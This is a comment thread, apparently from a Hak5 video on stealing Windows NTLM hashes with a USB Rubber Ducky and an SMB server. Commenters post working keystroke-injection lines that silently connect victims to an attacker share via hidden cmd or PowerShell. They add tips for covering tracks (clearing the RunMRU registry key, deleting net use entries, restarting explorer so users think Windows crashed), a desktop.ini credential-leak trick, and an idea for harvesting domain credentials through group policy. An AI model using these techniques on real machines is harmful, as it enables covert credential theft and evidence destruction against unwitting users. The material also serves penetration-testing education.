You can then do "net use /DELETE \\ipaddress" directly afterwards and not leave anything listed if they against all odds do a "net use". Cleanup is king.
now at the end of your script add: taskkill /F /IM explorer.exe>nul start explorer.exe might wanna add some delays to make sure it works. (They'll just think windows crashed again :D )
Looking everywhere for a Hak5 field kit. There was only 3 at BSides Augusta that they were raffling off. I just knew that was the last time I would see them. Wish I was one of the fortunate ones.
What about if you force NTLMv2? Also, Windows 10 has credential guard that is supposed to mitigate pass the hash vulnerabilities. Have you tried on Windows 10?
Could you not put a samba server in the cloud, and use a turtle to then vpn into that box, or would that not work. Not sure how the subnetting would function
+Hak5, what is the little device at the back of the table you guys keep touching? Looks like a GPD Win, but I can't tell for sure... [edit] Saw it at TekThings, not a GPD Win... but what else?!?
You could just use Powershell to browse the share instead of explorer and it will close by itself when done. Something like cmd /c start /min powershell "dir share"
Tried this and it takes time to output the contents of the remote directory, so there's more than just initiating a connection going on there. I have a pushd / popd method in my comment above which works in something like 200ms, but I'm sure something similar could be done with PowerShell (assuming PS hasn't been disabled by the admins).
I actually already knew samba (duh), but we do this thing called Watsoning, where one host asks questions for the audience while the other answers. If you've ever seen Sherlock, you've seen this in action. - Shannon
So Darren, great series - I'm a fan! I have a tetra, nano and a ducky.... I want the Pineapple book! Where do I find it? I checked the interwebs - can't see it...
"net use" can be used to connect to a smb share from the command line. This way you don't have to worry about figuring out how to close explorer using the ducky. I just got to thinking that if you had access to a domain controller, you could edit the group policy to run something like the equivalent of the ducky script from before to grab clear text credentials and send them elsewhere. I'm thinking that when someone signs into a domain, they probably don't think much of a command prompt window that opens minimized and then disappears. Then again, if you have direct access to the DC, there might be easier ways to get to the passwords, but possibly not in plain text. At that point, you would have to attack hashes. Assuming you could compromise a domain admin account, you could do this. Again, probably better ways to do this, but I just wanted to share what I was just thinking.
Correction: Bo didn't give you the stickers, I did. Also the USB Rubber Duck I adopted is doing finel, Fred gets along very well with Tommy the Lan Turtle.
Your talk about putting something "legit" on that share got me thinking..... Don't minimize it at all! Instead: MAKE IT LOOK LIKE THE FLASH DRIVE The user is going to be suspicious that the "USB Drive" didn't pop up. So why not make the share look like the contents of the flash drive?!
The problem with running the entire command within the run box is that the command history is left behind - not great for more tech savvy targets. Could just go with opening cmd and going from there. It would increase time of course but ultimately leave behind less evidence
No need to get into explore. Net use is way quicker. Problem is that all of these calls and attacks can be traced back if those computers are in a domain. So I wouldn't use this in a corperate environment.
Unless it's been resolved, the first time a ducky is inserted into a windows machine it takes anywhere from 30-90 seconds for windows to find and install HID drivers (the ducky is not USB). This has to be accounted for with a huge delay setting or the script will fire before the device is available, and fail. So... in a real world setting how are you guys getting a 2 second execution :)
well, actually you don't need a ducky for this. you need a thumb drive with a directory and a desktop.ini in it. With a modification to the desktop.ini the authentication happens instantly when the explorer is opened by the user.
So many hacks could be solved just by not allowing random USB things automatically become devices in system... Probably should invest some time in this to harden my setup.
It would but there is a way faster way to do it Using the commandline net use you can run it minimized in a self destructing cmd using: DELAY 1000 GUI r DELAY 200 STRING cmd /c start /min net use \\$ipaddress ^&exit If the samba server is already running, it will work under 2 seconds (but it leaves evidence behind in the run bar)
Well, since you guys said it... I got it down to 0.5 seconds ....... \o/
Why do you use the Explorer to connect to the share and not the net use command?
That way no Explorer window pops up :D
Great point - and I have no idea why I didn't think about that... Thanks!
no problem :D
there is a micro SD card slot on the surface
You can then do "net use /DELETE \\ipaddress" directly afterwards and not leave anything listed if they against all odds do a "net use". Cleanup is king.
I was wondering the exact thing
now at the end of your script add:
taskkill /F /IM explorer.exe>nul
start explorer.exe
might wanna add some delays to make sure it works. (They'll just think windows crashed again :D )
Looking everywhere for a Hak5 field kit. There was only 3 at BSides Augusta that they were raffling off. I just knew that was the last time I would see them. Wish I was one of the fortunate ones.
Question for Darren, what ducky scripts work when WIN+R is disabled for all the machines on the network?
Shannon, What is mini device with you , Mini device Right Hand side- Which model
What about if you force NTLMv2? Also, Windows 10 has credential guard that is supposed to mitigate pass the hash vulnerabilities. Have you tried on Windows 10?
I did this with a VBS script and got it in around .45 sec, nice video love you guys so much and keep doing whatever you are doing :)
Rusty Anera Can I please have the script?
+Hak5 +Hak5Darren where can I find the wifi pineappling book for sale?
It'll be in the HakShop next week
+Darren Kitchen thank you
Haha! I was wondering the same thing myself! Couldn't find it in the shop.
Awesome show
Hacker olduğunu bilmiyordum :D
Could you not put a samba server in the cloud, and use a turtle to then vpn into that box, or would that not work. Not sure how the subnetting would function
Where can we get the WiFi Pineapple book? I don't see it at the Hak Shop.
+Hak5, what is the little device at the back of the table you guys keep touching?
Looks like a GPD Win, but I can't tell for sure...
[edit] Saw it at TekThings, not a GPD Win... but what else?!?
The Lan turtle should get the SMB server as a module...
Hi there, what kind of hash is that? It is separeted by ":", so wich one is? Great video!
You can also close an Explorer window with Ctrl+W
You could just use Powershell to browse the share instead of explorer and it will close by itself when done. Something like cmd /c start /min powershell "dir share"
Tried this and it takes time to output the contents of the remote directory, so there's more than just initiating a connection going on there. I have a pushd / popd method in my comment above which works in something like 200ms, but I'm sure something similar could be done with PowerShell (assuming PS hasn't been disabled by the admins).
In windows 10 you need add the option "-smb2support" to the smbserver tool cause the smb1 protocol is disabled there by default
Daren owned the show today. Snubs learn samba.
I actually already knew samba (duh), but we do this thing called Watsoning, where one host asks questions for the audience while the other answers. If you've ever seen Sherlock, you've seen this in action. - Shannon
Yep....need more Rubber Duckies....Ordering another right now.
Couldn't you restart explorer to get rid of the open windows?
So Darren, great series - I'm a fan! I have a tetra, nano and a ducky.... I want the Pineapple book! Where do I find it? I checked the interwebs - can't see it...
What's the deal with using VMWare Workstation?
That Pineapple Mod, so awesome.
Any update/ETA on the Nano in your EU Store?
"net use" can be used to connect to a smb share from the command line. This way you don't have to worry about figuring out how to close explorer using the ducky.
I just got to thinking that if you had access to a domain controller, you could edit the group policy to run something like the equivalent of the ducky script from before to grab clear text credentials and send them elsewhere. I'm thinking that when someone signs into a domain, they probably don't think much of a command prompt window that opens minimized and then disappears. Then again, if you have direct access to the DC, there might be easier ways to get to the passwords, but possibly not in plain text. At that point, you would have to attack hashes. Assuming you could compromise a domain admin account, you could do this. Again, probably better ways to do this, but I just wanted to share what I was just thinking.
Awesome video guys! What's the small pocket PC in the back? Never seen that one before.
Keep up the awesome videos!
He used it in a previous video. Last season I believe.
So how do i decode a hash like this? didn't really understood it.
lol --- why are you using VMWare when your copy of Windows supports Hyper-V which has docker support?
what do u do with the hashes once you have captured them
Crack them.
just got done rewriting the ducky script in vbs and put it on a cd with autorun
does it only work on port 445 or can you change it in a config file and then port forward it to get passwords from any where
No. Samba port cannot be changed on Windows. Opening a share will default to 445 and you cannot open a share on another port.
damn
Anyone know if there is a LANTurtle module to run the SMBServer from Impaket
Hello Can you bring Back the usb Rubber ducky in the europe hakshop?
thank you
Shannon, is that an XPS 13 or 15?
13
If you are using Windows 10, did you ever achieved more than around 70% of CPU usage? I've never seen mine going there even when I tried to.
What do you do when the client has disabled cmd and command execution for all accessible users?
GUI e
F4
CTRL a
STRING \\0.0.0.0
ENTER
ALT F4
Any idea when the LAN turtle will be back in stock?
its back, just about to grab one but im waiting for the hak5 kit instead
Well done hak5 Team,
but i would use Powershell
powershell -noprofile -windowstyle hidden {access to \\10.10.1.1 or payload}
What kind of hash is that?
Correction: Bo didn't give you the stickers, I did. Also the USB Rubber Duck I adopted is doing finel, Fred gets along very well with Tommy the Lan Turtle.
Hey tell me why didn't we erase the browsing history of runline in this case like we did last week's episode of rubber ducky with minikatz
Your talk about putting something "legit" on that share got me thinking..... Don't minimize it at all! Instead:
MAKE IT LOOK LIKE THE FLASH DRIVE
The user is going to be suspicious that the "USB Drive" didn't pop up. So why not make the share look like the contents of the flash drive?!
How would one crack said hashes?
I want your tshirt... Looks amazing
The problem with running the entire command within the run box is that the command history is left behind - not great for more tech savvy targets. Could just go with opening cmd and going from there. It would increase time of course but ultimately leave behind less evidence
Or you could add a couple lines of code and delete the command history in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
How about some MS office macro hacking or something like that?
No need to get into explore. Net use is way quicker. Problem is that all of these calls and attacks can be traced back if those computers are in a domain. So I wouldn't use this in a corperate environment.
Unless it's been resolved, the first time a ducky is inserted into a windows machine it takes anywhere from 30-90 seconds for windows to find and install HID drivers (the ducky is not USB). This has to be accounted for with a huge delay setting or the script will fire before the device is available, and fail.
So... in a real world setting how are you guys getting a 2 second execution :)
well, actually you don't need a ducky for this. you need a thumb drive with a directory and a desktop.ini in it.
With a modification to the desktop.ini the authentication happens instantly when the explorer is opened by the user.
+Hard Reset Hmmm..you're absolutely right, that's an excellent way of accomplishing it!
Currently going thru a Voyager re-watch on Netflix now. :)
TNG Currently *Yay Canadian Netflix got it back*, then DS9 or Voyager.
Great job, will try out this with my ducky.
what are credentials?
Do something with the teensy please.
would i need a vmalware station
wait what's "hacking"?
How about making one for mac :D
How to crack this hash ??
How many times do you reckon this guy's been rejected by her?
i'd say his chances are better than yours
why you gotta burn him like that
probably OVER 9000 (times)!!
バカなの Why do you say that?
Savage
So many hacks could be solved just by not allowing random USB things automatically become devices in system... Probably should invest some time in this to harden my setup.
Don't forget to clear any evidence from the MRU's when you finish ..ahem.. testing the system.
Load PSkill on the remote share and you can kill the explorer session
press CTRL + W to close explorer window
Is there a reason this video is over 26 minutes?
quickest way to get hash is to ask any random rasta for his local hashish dealer, i though you knew that by now darren...
Good episode, thanks :)
cmd /C "start /MIN explorer \\localhost" taskkill \im explorer.exe this would be less detected
It would but there is a way faster way to do it
Using the commandline net use you can run it minimized in a self destructing cmd using:
DELAY 1000
GUI r
DELAY 200
STRING cmd /c start /min net use \\$ipaddress ^&exit
If the samba server is already running, it will work under 2 seconds (but it leaves evidence behind in the run bar)
Eliott Castafolte nice but your missing quotes
What a super hack and so simple!
Why didn't we erase the history as we did last week??
History of runline
*runs and hides behind evil server*
the girl with the Faraday cage
have you guys checked out droidducky?
easyer just to crack the SMB login with hydra
smb = 445 not 4445. "135/139/445" the evil trias! :P
Nice work.
./smbserver.py -comment 'test-share' TMP /tmp/
Traceback (most recent call last):
File "./smbserver.py", line 24, in
logger.init()
AttributeError: 'module' object has no attribute 'init'
Thanks
I need those stickers 😂 please
I love the videos, but can you please make some shorter videos. I don't want to watch a full 30 min video
17:30 😂😂😂
thanks! you guys are so badass ツ
I get it, now on duty
Gone in two seconds =)
cool!
Kikiki
plz hack roblox accounts
Freudian: th-cam.com/video/BH4M7djZfew/w-d-xo.html
Too much waffle. Please get to the point.
First!
No.
first lol